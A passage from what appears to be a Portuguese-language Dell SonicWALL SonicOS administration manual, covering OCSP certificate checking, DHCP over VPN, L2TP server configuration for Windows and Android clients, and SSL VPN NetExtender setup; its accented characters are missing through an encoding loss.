fornecer uma resposta bsica de BOM, REVOGADO ou DESCONHECIDO. Se o cliente e o
respondente do OCSP suportarem as extenses opcionais, outras respostas sero possveis.
O estado BOM a resposta desejada, visto que indica que o certificado no foi revogado. O
estado REVOGADO indica que o certificado foi revogado. O estado DESCONHECIDO indica
que o respondente no tem informaes sobre o certificado em questo.
Os servidores do OCSP, normalmente, trabalham com um servidor de autoridade de
certificao na configurao de envio ou de recebimento. O servidor de autoridade de
certificao pode ser configurado para enviar uma lista CRL (lista de revogao) para o
servidor do OCSP. Alm disso, o servidor do OCSP pode ser configurado para fazer o
download (recebimento) periodicamente da CRL do servidor de autoridade de certificao. O
servidor do OCSP tambm deve ser configurado com um certificado de assinatura de resposta
do OCSP emitido pelo servidor da autoridade de certificao. O certificado de assinatura deve
ser formatado corretamente ou o cliente do OCSP no aceitar a resposta do servidor do
OSCP.

Respondente do OpenCA OCSP
Usar o OCSP requer o Respondente do OpenCA OCSP OpenCA (OpenSource Certificate
Authority), visto que ele o nico respondente do OCSP suportado. O Respondente do
OpenCA OCSP est disponvel em http://www.openca.org. O Respondente do OpenCA OCSP
um respondente do OCSP compatvel ao rfc2560 que executado em uma porta padro
2560 em homenagem ao se basear em rfc2560.
Carregando certificados a serem usados com o OCSP

Para o SonicOS atuar como um cliente do OCSP para um respondente, o certificado de CA
deve ser carregado no firewall.
Etapa 1 Na pgina Sistema -> Certificados, clique no boto Importar. Isso abrir a pgina Importar
certificado.
Etapa 2 Selecione a opo Importar um certificado de CA de um arquivo codificado PKCSn7
(.p7b), PEM (.pem) ou DER (.der ou .cer) e especifique o local do certificado.
Usando o OCSP com polticas de VPN

As configuraes do OCSP do firewall podem ser configuradas em um nvel de diretiva ou
globalmente. Para configurar a verificao do OCSP para polticas de VPN individuais, use a
guia Avanado da pgina de configurao Poltica de VPN.
Etapa 1 Selecione o boto de opes prximo a Habilitar verificao do OCSP.

Etapa 2 Especifique a URL do respondente do OCSP do servidor do OCSP, por exemplo
http://192.168.168.220:2560 em que 192.168.168.220 o endereo IP do servidor do OCSP e
2560 a porta padro de operao para o servio de respondente do OpenCA OCSP.

Captulo 55
Configurando o DHCP sobre VPN
VPN > DHCP sobre VPN

A pgina VPN > DHCP sobre VPN permite configurar um firewall para obter uma concesso
de endereo IP de um servidor DHCP no final de um tnel de VPN. Em algumas implantaes
de rede, desejvel ter todas as redes VPN em uma sub-rede IP lgica e criar a aparncia de
todas as redes VPN que residem em um espao de endereo de sub-rede IP. Isso facilita a
administrao de endereo IP para as redes usando tneis de VPN.
Modo de retransmisso de DHCP

O firewall nos sites remoto e central configurado para tneis de VPN para trfego DHCP
inicial, bem como trfego IP subsequente entre os sites. O firewall no site remoto (Gateway
remoto) passa pacotes de difuso DHCP por meio de seu tnel de VPN. O firewall no site
central (Gateway central) retransmite pacotes DHCP do cliente na rede remota para o servidor
DHCP no site central.
Configurando o DHCP sobre VPN | 871

Configurando o gateway central para DHCP sobre VPN
Para configurar DHCP sobre VPN para o Gateway central, use as seguintes etapas:
1. Selecione VPN > DHCP sobre VPN.
2. Selecione Gateway central no menu Modo de retransmisso de DHCP.
3. Clique em Configurar. A janela Configurao de DHCP sobre VPN exibida.
4. Se desejar usar o Servidor DHCP para clientes globais de VPN e/ou para um firewall
remoto, selecione a opo Usar servidor DHCP interno.
5. Para usar o Servidor DHCP para clientes globais de VPN, selecione a opo Clientes
globais de VPN.
6. Para usar o Servidor DHCP para um firewall remoto, selecione a opoFirewall remoto.
7. Se voc desejar enviar solicitaes DHCP aos servidores especficos, selecione Enviar
solicitaes DHCP aos endereos de servidores listados abaixo.
8. Clique em Adicionar. A janela Adicionar servidor DHCP exibida.
9. Digite os endereos IP dos servidores DHCP no campo Endereo IP e clique em OK. O
firewall agora direciona solicitaes DHCP para os servidores especificados.
10. Digite o endereo IP de um servidor de retransmisso no campo Endereo IP de
retransmisso (opcional).
Para editar uma entrada na tabela Endereo IP, clique em Editar. Para excluir um Servidor
DHCP, destaque a entrada na tabela Endereo IP e clique em Excluir. Clique em Excluir tudo
para excluir todas as entradas.
Configurando o gateway remoto DHCP sobre VPN

1. Selecione Gateway remoto no menu Modo de retransmisso de DHCP.

2. Clique em Configurar. A janela Configurao de DHCP sobre VPN exibida.
3. Na guia Geral, o nome da poltica de VPN ser exibido automaticamente no campo

Retransmitir DHCP por meio deste tnel de VPN, se a poltica de VPN tiver a configurao
A rede local obtm endereos IP usando DHCP por meio desse tnel de VPN
habilitada.
Nota Apenas polticas de VPN que usam IKE podem ser usadas como tneis de VPN para DHCP.
4. Selecione a interface qual a concesso de DHCP est ligada no menu Concesso de

DHCP ligada a.
5. Se voc inserir um endereo IP no campo Endereo IP de retransmisso, esse endereo
IP ser usado como o endereo IP de agente de retransmisso de DHCP, em vez do
endereo do gateway central e dever ser reservado no escopo DHCP no servidor DHCP.
Este endereo tambm pode ser usado para gerenciar este firewall remotamente por meio
do tnel de VPN por detrs do gateway central.
6. Se voc inserir um endereo IP no campo Endereo IP de gerenciamento remoto, esse
endereo IP ser usado para gerenciar o firewall por trs do gateway central e dever ser
reservado no escopo DHCP no servidor DHCP.
7. Se voc habilitar Bloquear trfego pelo tnel ao detectar IP falsificado, o firewall
bloquear qualquer trfego no tnel de VPN que estiver forjando o endereo IP de um
usurio autenticado. Se voc tiver quaisquer dispositivos estticos, no entanto, dever
garantir que o endereo Ethernet correto seja digitado para o dispositivo. O endereo
Ethernet usado como parte do processo de identificao e um endereo Ethernet
incorreto pode fazer com que o firewall responda ao IP falsificado.
8. Se o tnel de VPN for interrompido, concesses DHCP temporrias podero ser obtidas a
partir do servidor DHCP local. Depois que o tnel estiver ativo novamente, o servidor
DHCP local parar de emitir concesses. Habilite a caixa de seleo Obter concesso
temporria do servidor DHCP local se o tnel estiver inativo. Ao habilitar esta caixa de
seleo, voc ter uma opo de failover no caso do tnel deixar de funcionar. Se voc
desejar permitir concesses temporrias para um determinado perodo de tempo, digite o
nmero de minutos para a concesso temporria na caixa Tempo de concesso
temporria. O valor padro 2 minutos.

Dispositivos
1. Para configurar dispositivos na LAN, clique na guia Dispositivos.
2. Para configurar Dispositivos estticos em LAN, clique em Adicionar para exibir a janela
Adicionar entrada de dispositivo da LAN e digite o endereo IP do dispositivo no campo
Endereo IP e, em seguida, digite o endereo Ethernet do dispositivo no campo Endereo
Ethernet.
Um exemplo de um dispositivo esttico uma impressora, visto que ela no pode obter
uma concesso de IP dinamicamente. Se voc no tiver Bloquear trfego pelo tnel ao
detectar IP falsificado habilitado, no ser necessrio digitar o endereo Ethernet de um
dispositivo. Deve-se excluir os endereos IP estticos do conjunto de endereos IP
disponveis no servidor DHCP, para que o servidor DHCP no atribua esses endereos a
clientes DHCP. Deve-se tambm excluir o endereo IP usado como o Endereo IP de
retransmisso. recomendvel reservar um bloco de endereos IP a serem usados como
endereos IP de retransmisso. Clique em OK.
3. Para excluir dispositivos na LAN, clique Adicionar para exibir a janela Adicionar entrada
de LAN excluda. Digite o endereo MAC do dispositivo no campo Endereo Ethernet.
Clique em OK.
4. Clique em OK para sair da janela Configurao de DHCP sobre VPN.
Nota Deve-se configurar o servidor DHCP local no firewall remoto para atribuir concesses de IP
a esses computadores.
Nota Se um site remoto tiver problemas para se conectar a um gateway central e para obter uma
concesso, verifique se o DNE (Deterministic Network Enhancer) no est habilitado no
computador remoto.
Dica Se um endereo IP de LAN estiver fora do escopo do DHCP, o roteamento ser possvel
para esse IP, por exemplo, duas LANs.

Concesses atuais de DHCP sobre VPN
A janela de rolagem mostra os detalhes sobre as ligaes atuais: Endereo Ethernet e IP das
ligaes, juntamente com o Tempo de concesso e o Nome do tnel.
Para excluir uma ligao, que libera o endereo IP no servidor DHCP, selecione a ligao na
lista e clique no cone Excluir . A operao leva alguns segundos para ser concluda.
Depois de concluda, uma mensagem confirmando a atualizao ser exibida na parte inferior
da janela do navegador da web.
Clique em Excluir tudo para excluir todas as concesses de VPN.

Captulo 56
Configurando servidores L2TP e Acesso
de cliente de VPN
VPN > Servidor L2TP

O dispositivo de segurana de rede da Dell SonicWALL pode encerrar as conexes L2TP sobre
IPsec de entrada dos clientes Microsoft Windows ou Google Android. Em situaes em que
executar o Cliente de VPN Global no possvel, possvel usar o servidor L2TP da Dell
SonicWALL para fornecer acesso seguro aos recursos atrs do firewall.
possvel usar L2TP (Layer 2 Tunneling Protocol) para criar VPN sobre redes pblicas, como
a Internet. O L2TP fornece a interoperabilidade entre diferentes fornecedores de VPN que os
protocolos como PPTP e L2F no fazem, embora o L2TP combina o melhor dos protocolos e
uma extenso deles.
O L2TP oferece suporte a vrias opes de autenticao suportadas pelo PPP, incluindo o
Password Authentication Protocol (PAP), o Challenge Handshake Authentication Protocol
(CHAP) e o Microsoft Challenge Handshake Authentication Protocol (MS-CHAP). possvel
usar o L2TP para autenticar os pontos de terminais de um tnel de VPN para fornecer
segurana adicional e, possvel implement-lo com o IPsec para fornecer uma soluo de
VPN segura e criptografada.
Configurando o servidor L2TP na pgina 878
Exibindo atualmente sesses L2TP ativas na pgina 880
Configurando o acesso de cliente de VPN L2TP do Microsoft Windows na pgina 880
Configurando o acesso de cliente VPN L2TP do Google Android na pgina 882
Nota Para obter informaes mais completas sobre como configurar o servidor L2TP, consulte a
nota tcnica Configurando o servidor L2TP no SonicOS localizada no site de
documentao da Dell SonicWALL:http://www.sonicwall.com/us/Support.html.
Configurando servidores L2TP e Acesso de cliente de VPN | 877

Configurando o servidor L2TP
A pgina VPN > Servidor L2TP fornece as definies para configurar o dispositivo de
segurana de rede da Dell SonicWALL como um servidor L2TP.
Para configurar o servidor L2TP:
Etapa 1 Selecione a opo Habilitar servidor L2TP.

Etapa 2 Clique em Configurar para exibir a caixa de dilogo Configurao do servidor L2TP.
Etapa 3 Selecione a guia Servidor L2TP.

Etapa 4 Insira o nmero de segundos no campo Tempo de Keepalive (s) para enviar os pacotes
especiais para manter a conexo aberta. O padro 60 segundos.
Etapa 5 Insira o endereo IP do primeiro servidor DNS no campo Servidor DNS 1. Se voc tiver um
segundo servidor DNS, digite o endereo IP no campo Servidor DNS 2.
Etapa 6 Insira o endereo IP do primeiro servidor WINS no campo Servidor WINS 1. Se voc tiver um
segundo servidor WINS, digite o endereo IP no campo Servidor WINS 2.
Etapa 7 Selecione a guia Usurios do L2TP.
Etapa 8 Selecione Endereo IP fornecido pelo servidor RADIUS/LDAP, se um servidor RADIUS/
LDAP fornecer informaes de endereo IP aos clientes L2TP.

Etapa 9 Se o servidor de L2TP fornecer endereos IP, selecione Usar o pool de IP L2TP local. Insira
o intervalo de endereos IP privados nos campos IP de incio e IP de fim. Os endereos de
IP privados devem ser um intervalo de endereos IP na LAN.
Etapa 10 Se voc tiver configurado um grupo de usurios especficos definido para o uso de L2TP,
selecione-o no menu Grupo de usurios para usurios L2TP ou use Todos.
Guia PPP
O painel Configuraes de PPP na guia PPP permite que voc adicione ou remova protocolos
de autenticao, ou reorganize a ordem preferida dos protocolos de autenticao.

Exibindo atualmente sesses L2TP ativas
O painel Sesses L2TP ativas exibe as sesses do L2TP ativas no momento.
As informaes a seguir so exibidas.

Nome do usurio - o nome do usurio atribudo no banco de dados do usurio local ou o
banco de dados do usurio de RADIUS.
IP PPP - o endereo IP de origem da conexo.
Zona - a zona usada pelo cliente L2TP.
Interface - a interface usada para acessar o servidor L2TP, se ele for um cliente de VPN
ou outro firewall.
Autenticao - tipo de autenticao usada pelo cliente L2TP.
Nome do host - o nome do cliente L2TP que se conecto ao servidor L2TP.
Configurando o acesso de cliente de VPN L2TP do Microsoft

Windows
Esta seo fornece um exemplo de configurao para habilitar o acesso de cliente L2TP para
o WAN GroupVPN SA que usa o cliente de VPN L2TP da Microsoft e o servidor L2TP integrado.
Para habilitar o acesso de Cliente de VPN L2TP da Microsoft para WAN GroupVPN SA,
Etapa 1 Navegue at a pgina VPN > Configuraes. Para a poltica de WAN GroupVPN, clique no
boto Configurar cone.
Etapa 2 Na guia Geral, selecione IKE usando segredo pr-compartilhado no menu suspenso Mtodo
de autenticao. Insira uma senha de segredo compartilhado para concluir a configurao de
poltica de cliente. E clique no boto OK.
Etapa 3 Navegue at a pgina VPN > Servidor L2TP. Na seo de Configuraes de servidor L2TP,
clique na caixa de seleo Habilitar o servidor L2TP. E clique no boto Configurar. A pgina
de definio Configuraes de servidor L2TP exibida.
Etapa 4 Fornea as seguintes configuraes de servidor L2TP:
Tempo de keep alive (s): 60
Servidor DNS 1: 199.2.252.10 (ou use o DNS do ISP)
Servidor WINS 1: 0.0.0.0 (ou use o IP WINS)

Etapa 5 Fornece as configuraes do endereo IP.
Endereo IP fornecido pelo Servidor RADIUS/LDAP: Desabilitado
Usar o pool de IP L2TP local: Habilitado
IP inicial: 10.20.0.1 (exemplo)
IP final: 10.20.0.20 (exemplo)
Nota Use qualquer intervalo privado exclusivo.
Etapa 6 Na seo Usurios L2TP, selecione o Usurios confiveis no menu suspenso Grupo de
usurios para usurios L2TP.
Etapa 7 V at a pgina Usurios > Usurios locais. Clique no boto Adicionar usurio.
Etapa 8 Na guia Configuraes, especifique um nome de usurio e uma senha.
Nota Editando o Firewall > Regras de acesso para a zona da LAN de VPN ou outra zona de
VPN, possvel restringir o acesso rede para clientes L2TP. Para localizar uma regra a
ser editada, selecione a exibio Todas as regras da tabela Regras de acesso e examine
a coluna Origem. O objeto de endereo na coluna Origem de linhas aplicveis exibe o
"Pool de IP L2TP".
Etapa 10 No computador com Microsoft Windows, conclua a configurao Cliente de VPN L2TP a seguir
para habilitar o acesso seguro:
Navegue at Windows > Iniciar > Painel de controle > Conexes de rede.
Abra o assistente Nova conexo. Clique em Avanar.
Escolha "Conectar-se rede em meu local de trabalho". Clique em Avanar.
Escolha "Conexo de rede privada virtual". Clique em Avanar.
Insira um nome para a conexo de VPN. Clique em Avanar.
Insira o endereo IP (WAN) pblico do firewall. Como alternativa, possvel usar um
nome de domnio que aponta para o firewall. Clique em Avanar, em seguida, clique
em Finalizar. A janela de conexo ser exibida. Clique em Propriedades.
Clique na guia Segurana. Clique em "Configuraes IPSec". Habilite "Uso de chave
pr-compartilhada para autenticao". Insira o segredo pr-compartilhado. Clique em
OK.
Clique na guia Rede. Altere o "Tipo de VPN" de "Automtico" para "VPN IPSec L2TP".
Clique em OK.
10) Insira o nome de usurio XAUTH e senha. Clique em Conectar.
Etapa 11 Verifique se o dispositivo de VPN L2TP do Microsoft Windows est conectado, navegue at a
pgina VPN > Configuraes. O cliente VPN exibido na seo Tneis de VPN ativos
atualmente.

Configurando o acesso de cliente VPN L2TP do Google Android
Esta seo fornece um exemplo de configurao para habilitar o acesso de cliente L2TP para
WAN GroupVPN SA que usa o cliente VPN L2TP do Google Android e o servidor L2TP
integrado.
Para permitir acesso de Cliente VPN L2TP do Google Android WAN GroupVPN SA, execute
Etapa 1 Navegue at a pgina VPN > Configuraes. Para a poltica de WAN GroupVPN, clique no
boto Configurar cone.
Etapa 2 Na guia Geral, selecione IKE usando segredo pr-compartilhado no menu suspenso Mtodo
de autenticao. Insira uma senha de segredo compartilhado para concluir a configurao de
poltica de cliente. E clique no boto OK.
Etapa 3 Para a guia Propostas para fornecer as seguintes configuraes para Proposta de IKE (fase 1)
e proposta de IPsec (fase 2):
Grupo DH: Grupo 2
Criptografia: 3DES
Autenticao: SHA1
Durao (segundos): 28800
Protocolo: ESP
Criptografia: DES
Autenticao: SHA1
Habilitar segredo de encaminhamento perfeito: Habilitado
Durao (segundos): 28800
Etapa 4 Na guia Avanado, fornea as seguintes configuraes:
Habilitar difuso de rede Windows (NetBIOS): Habilitado
Habilitar difuso seletiva: Desabilitado
Gerenciamento por meio deste SA: Todos Desabilitados
Gateway padro: 0.0.0.0
Requerer autenticao de clientes de VPN por XAUTH: Habilitado
Grupo de usurios para usurios XAUTH: Usurios confiveis
Etapa 5 Na guia Cliente, fornea as seguintes configuraes:
Armazenar em cache nome de usurio XAUTH e senha no cliente: Sesso nica ou
Sempre
Configuraes do adaptador virtual: Concesso de DHCP
Permitir conexes com: Tneis de diviso
Definir rota padro como este gateway: Desabilitado
Usar chave padro para provisionamento de cliente simples: Habilitado
Etapa 6 Navegue at a pgina VPN > Servidor L2TP. Na seo de Configuraes de servidor L2TP,
clique na caixa de seleo Habilitar o servidor L2TP. E clique no boto Configurar. A pgina
de definio Configuraes de servidor L2TP exibida.

Etapa 7 Fornea as seguintes configuraes de servidor L2TP:
Tempo de keep alive (s): 60
Etapa 8 Fornece as configuraes do endereo IP.
Endereo IP fornecido pelo Servidor RADIUS/LDAP: Desabilitado
Usar o pool de IP L2TP local: Habilitado
IP inicial: 10.20.0.1 (exemplo)
IP final: 10.20.0.20 (exemplo)
Nota Use qualquer intervalo privado exclusivo.
Etapa 9 Na seo de Usurios L2TP, selecione Usurios confiveis no menu suspenso Grupo de
usurios para usurios L2TP.
Etapa 10 V at a pgina Usurios > Usurios locais. Clique no boto Adicionar usurio.
Etapa 11 Na guia Configuraes, especifique um nome de usurio e uma senha.
Etapa 12 Na guia Acesso de VPN, adicione o(s) objeto(s) de endereo de rede desejado(s) que os
clientes L2TP adicionam s redes de lista de acessos.
Nota No mnimo, adicione os objetos de endereo de sub-redes de LAN, sub-rede

primria de LAN e Pool de IP L2TP lista de acessos.
Nota Agora, a configurao do SonicOS foi concluda.
Etapa 13 No dispositivo Google Android, conclua a configurao de Cliente VPN L2TP a seguir para
habilitar o acesso seguro:
Navegue at a pgina APP e selecione o cone Configuraes. No menu
Configuraes, selecione Sem fio e redes.
Selecione Configuraes de VPN e clique em Adicionar VPN.
Selecione Adicionar VPN PSK L2TP/IPSec.
Nome de VPN: inserir um nome amigvel de VPN
Definir o servidor VPN: insira o endereo IP pblico do firewall
Definir chave pr-compartilhada IPSec: insira a senha para a poltica de WAN
GroupVPN
Segredo L2TP: deixe em branco
Domnio de LAN: configurao opcional
Insira o nome de usurio e senha. Clique em Conectar.
Etapa 14 Verifique se o dispositivo Google Android est conectado navegando at a pgina VPN >
Configuraes. O cliente VPN exibido na seo Tneis de VPN ativos atualmente.

Parte 14
SSL VPN
| 885
Captulo 57
Configurao SSL VPN
SSL VPN
Esta seo fornece informaes sobre como configurar os recursos de SSL VPN no dispositivo
de segurana de rede Dell SonicWALL. Os recursos de SSL VPN da SonicWALL fornecem
acesso remoto seguro rede usando o cliente NetExtender.
O NetExtender um cliente de SSL VPN para usurios de Windows, Mac ou Linux que
baixado transparente e que permite que voc execute qualquer aplicativo com segurana na
rede da empresa. Usa PPP (Point-to-Point Protocol). O NetExtender permite que clientes
remotos tenham acesso sem igual aos recursos na sua rede local. Usurios podem acessar o
NetExtender de duas maneiras:
Fazendo login no portal da web do Virtual Office fornecido pelo dispositivo de segurana
de rede Dell SonicWALL e clicando no boto NetExtender.
Iniciando o cliente do NetExtender independente.
O cliente NetExtender independente instalado na primeira vez que voc iniciar o
NetExtender. Depois disso, ele pode ser acessado diretamente do menu Iniciar em sistemas
Windows, da pasta de Aplicativo ou acoplar-se em sistemas MacOS ou pelo nome do caminho
ou na barra de atalho em sistemas Linux.
SSL VPN NetExtender Viso geral na pgina 888
Configurao de Usurios para Acesso SSL VPN na pgina 890
SSL VPN > Status na pgina 892
SSL VPN > Configuraes do Servidor na pgina 893
SSL VPN > Configuraes do Portal na pgina 894
SSL VPN > Configuraes do Cliente na pgina 896
SSL VPN > Rotas de clientes na pgina 899
SSL VPN > Virtual Office na pgina 901
Acesso ao Portal SSL VPN na pgina 901
Uso do NetExtender na pgina 901
Configurao de Marcadores SSL VPN na pgina 927
Uso de Marcadores SSL VPN na pgina 931
Configurao SSL VPN | 887

SSL VPN NetExtender Viso geral
Esta seo fornece uma Introduo ao recurso SonicOS SSL VPN NetExtender. Esta seo
O qu SSL VPN NetExtender? na pgina 888
Conceitos do NetExtender na pgina 888
O qu SSL VPN NetExtender?

O recurso SSL VPN NetExtender da SonicWALL um aplicativo de software transparente para
usurios Windows, Mac e Linux que permite que usurios remotos se conectem com
segurana rede remota. Com o NetExtender, os usurios remotos podem executar qualquer
aplicativo com segurana na rede remota. Os usurios podem subir e baixar arquivos, montar
unidades de rede e acessar os recursos como se estivessem na rede local. A conexo
NetExtender usa uma conexo por protocolo PPP (protocolo ponto a ponto).
Benefcios
O NetExtender fornece aos usurios remotos acesso total sua rede interna protegida. A
experincia virtualmente idntica daquela que usa um cliente IPSec VPN tradicional, mas o
NetExtender no requer qualquer instalao manual do cliente. Em vez disso, o cliente
NetExtender Windows instalado automaticamente no PC de um usurio remoto por um
controle ActiveX ao usar o navegador Internet Explorer ou com o plug-in XPCOM quando usar
o Firefox. Em sistemas MacOS, os navegadores suportados usam controles de Java para
instalar automaticamente o NetExtender a partir do portal Virtual Office. Os sistemas Linux
tambm podem instalar e usar o cliente NetExtender.
Aps a instalao, o NetExtender inicia-se automaticamente e conecta-se a um adaptador
virtual para acesso seguro a ponto a ponto SSL-VPN para hosts permitidos e sub-redes na
rede interna.
Conceitos do NetExtender
As sees a seguir descrevem os conceitos avanados do NetExtender:
Cliente independente na pgina 888
Rotas de cliente na pgina 889
Modo Todos tneis na pgina 889
Scripts de Conexo na pgina 889
Configurao de proxy na pgina 889
Cliente independente
O NetExtender um aplicativo leve instalado no navegador que fornece acesso remoto

abrangente sem exigir que os usurios baixem e instalem o aplicativo manualmente. A primeira
vez que um usurio inicia o NetExtender, o cliente autnomo do NetExtender instalado
automaticamente no PC ou Mac do usurio. O instalador cria um perfil com base nas
informaes de login do usurio. A janela do instalador fecha e inicia automaticamente o
NetExtender. Se o usurio tem uma verso herdada do NetExtender instalada, o instalador
primeiro desinstalar o NetExtender antigo e instalar a nova verso.

Quando o cliente autnomo do NetExtender tiver sido instalado, os usurios Windows podem
iniciar o NetExtender diretamente de seus PCs, no menu Iniciar > Programas e configurar o
NetExtender para iniciar quando o Windows for inicializado. Os usurios Mac podem iniciar o
NetExtender das suas pastas de Aplicativos do sistema ou arrastar o cone para o painel de
controle para acesso rpido. Nos sistemas Linux, o instalador cria um atalho na rea de
trabalho em /usr/share/NetExtender. Isso pode ser arrastado para a barra de atalhos em
ambientes como Gnome e KDE.
Rotas de cliente
Rotas de cliente NetExtender so usadas para permitir e negar acesso aos usurios de SSL
VPN a diversos recursos de rede. Objetos de endereo so usados para dinamicamente e
facilmente configurar o acesso aos recursos da rede.
Modo Todos tneis
O modo Todos os tneis controla todo o trfego de e para o usurio remoto atravs do tnel
SSL VPN NetExtender incluindo o trfego destinado para rede local do usurio remoto. Isso
feito adicionando as seguintes rotas tabela de roteamento do cliente remoto:
Endereo IP Mscara de sub-rede

0.0.0.0 0.0.0.0
0.0.0.0 128.0.0.0
128.0.0.0 128.0.0.0
O NetExtender tambm adiciona rotas para as redes locais de todas as conexes de rede
conectadas. Essas rotas so configuradas com mtricas mais altas do que todas as rotas
existentes para forar o trfego destinado para a rede local atravs do tnel SSL VPN. Por
exemplo, se um usurio remoto tem o Endereo IP 10.0.67.64 na rede 10.0. *. *, a rota
10.0.0.0/255.255.0.0 adicionada para rotear o trfego por meio do tnel SSL VPN.
O modo Todos os tneis est configurado na pgina SSL VPN > Rotas de cliente.
Scripts de Conexo
O SonicWALL SSL VPN fornece aos usurios a capacidade de executar scripts de arquivos em
lote quando o NetExtender se conecta e desconecta. Os scripts podem ser usados para
mapear ou desconectar unidades de rede e impressoras, iniciar aplicativos ou abrir arquivos
ou sites da Web. Os Scripts de Conexo NetExtender podem oferecer suporte a quaisquer
comandos de arquivo em lotes vlidos.
Configurao de proxy
O SonicWALL SSL VPN oferece suporte a sesses do NetExtender usando configuraes de

proxy. Atualmente, h suporte apenas para proxy HTTPS. Ao iniciar o NetExtender do portal
da Web, se seu navegador j est configurado para acesso ao proxy, o NetExtender herda
automaticamente as configuraes de proxy. As configuraes de proxy tambm podem ser
manualmente configuradas nas preferncias de cliente do NetExtender. O NetExtender pode
detectar automaticamente as configuraes de proxy para servidores proxy que suportam o
WPAD (Web Proxy Auto Discovery).
O NetExtender fornece trs opes para definir as configuraes de proxy:

Detectar automaticamente as configuraes - para usar essa configurao, o servidor
proxy deve oferecer suporte a WPAD (Web Proxy Auto Discovery), que pode enviar
automaticamente o script de configuraes de proxy para o cliente.
Usar script de configurao automtica -se voc souber o local do script de
configuraes de proxy, voc pode selecionar esta opo e fornecer o URL do script.
Usar o servidor proxy -voc pode usar esta opo para especificar o Endereo IP e a
porta do servidor proxy. Como alternativa, voc pode inserir um Endereo IP ou domnio
no campo BypassProxy para permitir conexes diretas a esses endereos e ignorar o
servidor proxy. Se necessrio, voc pode inserir um nome de usurio e uma senha para o
servidor proxy. Se o servidor proxy requer um nome de usurio e uma senha, mas voc
no os especifica, uma janela pop-up do NetExtender o avisar para inseri-los ao conectar-
se pela primeira vez.
Quando o NetExtender se conecta usando as configuraes de proxy, estabelece uma
conexo HTTPS para o servidor proxy em vez de conectar diretamente ao servidor do firewall.
Em seguida, o servidor proxy encaminha o trfego para o servidor SSL VPN. Todo o trfego
criptografado por SSL com o certificado negociado pelo NetExtender, do qual o servidor proxy
no tem conhecimento. O processo de conexo idntico para usurios proxy e no proxy.
Configurao de Usurios para Acesso SSL VPN

A fim de que os usurios possam acessar servios de SSL VPN, eles devem ser atribudos ao
grupo Servios SSLVPN. Usurios que tentam fazer login atravs do Virtual Office e que no
pertencem ao grupo Servios SSLVPN tero acesso negado. As sees a seguir descrevem
como configurar contas de usurio para acesso SSL VPN:
Configurao do Acesso de VPN SSL para Usurios Locais na pgina 890
Configurao do Acesso SSL VPN para Usurios RADIUS na pgina 891
Configurao do Acesso SSL VPN para Usurios LPAD na pgina 891
Configurao do Acesso de VPN SSL para Usurios Locais

Para configurar usurios no banco de dados de usurios locais para acesso SSL VPN, voc
deve adicio0nar os usurios ao grupo de usurios Servios SSLVPN. Para fazer isso, execute
Etapa 1 Navegue at a pgina Usurios > Usurios locais.
Etapa 2 Clique no cone de configurao para o usurio que deseja editar ou clique no boto
Adicionar usurio para criar um novo usurio. A janela Editar usurio iniciada.
Etapa 3 Clique na guia Grupos.
Etapa 4 Na coluna de Grupos de usurios, clique em Servios SSLVPN e clique na seta para a direita
para mov-lo para a coluna Membro de.
Etapa 5 Clique na guia Acesso VPN. A guia Acesso VPN configura quais recursos da rede os usurios
da VPN (marcadores do GVC, NetExtender ou Virtual Office) podem acessar. Selecione um ou
mais objetos ou grupos de endereo de rede da lista Redes e clique no boto de seta para a
direita (->) para mov-los para a coluna Lista de acesso. Para remover acesso do usurio a
um objeto ou grupo de endereos de rede, selecione a rede a partir da Lista de acesso, e
clique no boto de seta para a esquerda (<-).

Nota A guia Acesso VPN afeta a capacidade de clientes remotos de usar marcadores do GVC,
NetExtender e SSL VPN Virtual Office para acessar os recursos da rede. Para permitir que
os usurios do GVC, NetExtender ou Virtual Office acessem um recurso da rede, os objetos
ou grupos de endereo da rede devem ser adicionados lista de permisses na guia
Acesso VPN.
Configurao do Acesso SSL VPN para Usurios RADIUS

Para configurar usurios RADIUS para acesso SSL VPN, voc deve adicionar os usurios ao
grupo de usurios Servios SSLVPN. Para fazer isso, execute as seguintes etapas:
Etapa 1 Navegue at a pgina Usurios > Configuraes.

Etapa 2 No menu suspenso Mtodo de autenticao para login menu, selecione RADIUS ou
RADIUS + Usurios locais.
Etapa 3 Clique no boto Configurar para Mtodo de autenticao para login. A janela Configurao
RADIUS exibida.
Etapa 4 Clique na guia Usurios RADIUS.
Etapa 5 No menu suspenso Grupo de usurios padro ao qual todos os usurios RADIUS
pertencem, selecione Servios SSLVPN.
Nota A guia Acesso VPN na janela Editar usurio tambm outro controle granular para acesso
para ambos os marcadores do Virtual Office e acesso NetExtender.
Configurao do Acesso SSL VPN para Usurios LPAD

Para configurar usurios LDAP para acesso SSL VPN, voc deve adicionar os grupos de
usurio LDAP ao grupo de usurios Servios SSLVPN. Para fazer isso, execute as seguintes
etapas:

Etapa 2 Defina o Mtodo de Autenticao para login para LDAP ou LDAP + Usurios locais.
Etapa 3 Clique no boto Configurar para iniciar a janela Configurao LDAP.
Etapa 4 Clique na guia Usurios LDAP.
Etapa 5 No menu suspenso Grupo de usurios LDAP padro, selecione Servios SSLVPN.
Nota A guia AcessoVPN na janela Editar usurio tambm outro controle granular para acesso
para ambos os Marcadores do Virtual Office e acesso NetExtender.

SSL VPN > Status
A pgina SSL VPN > Status exibe um resumo de sesses ativas do NetExtender, incluindo o
nome, o Endereo IP PPP, o Endereo IP fsico, hora de login, extenso de tempo de logon e
hora de logout.
A tabela a seguir fornece uma descrio dos itens de status.
Item de Status Descrio

Nome de usurio O nome de usurio.
IP virtual do cliente O Endereo IP atribudo para o usurio do Endereo IP do cliente.
IP de WAN do cliente O endereo IP privado do usurio.
Tempo de login A quantidade de tempo desde que o usurio estabeleceu conexo com o
dispositivo SSL VPN expresso pela primeira vez como nmero de dias e a hora
(HH:MM:SS).
Tempo de inatividade Durao de tempo que o usurio ficou inativo.
Conectado A hora quando o usurio inicialmente fez login.
Efetuar logout Fornece ao administrador a capacidade de fazer logout de uma sesso do
NetExtender.

SSL VPN > Configuraes do Servidor
A pgina SSL VPN > Configuraes do servidor usada para configurar detalhes do
comportamento do firewall como um servidor SSL VPN.
As opes a seguir podem ser configuradas na pgina SSL VPN > Configuraes do servidor.
Status de SSL VPN em zonas: Exibe o status do acesso SSL VPN em cada zona. Verde
indica status ativo do SSL VPN, enquanto o vermelho indica status inativo do SSL VPN.
Para habilitar ou desabilitar o acesso SSL-VPN em uma zona, clique no nome de zona para
ir para a janela Editar zona.
Porta de SSL VPN: Defina a porta de SSL VPN para o dispositivo. O padro 4433.
Seleo de certificado: Selecione o certificado que ser usado para autenticar usurios
de SSL VPN. Para gerenciar certificados, v para a pgina Rede -> Certificados
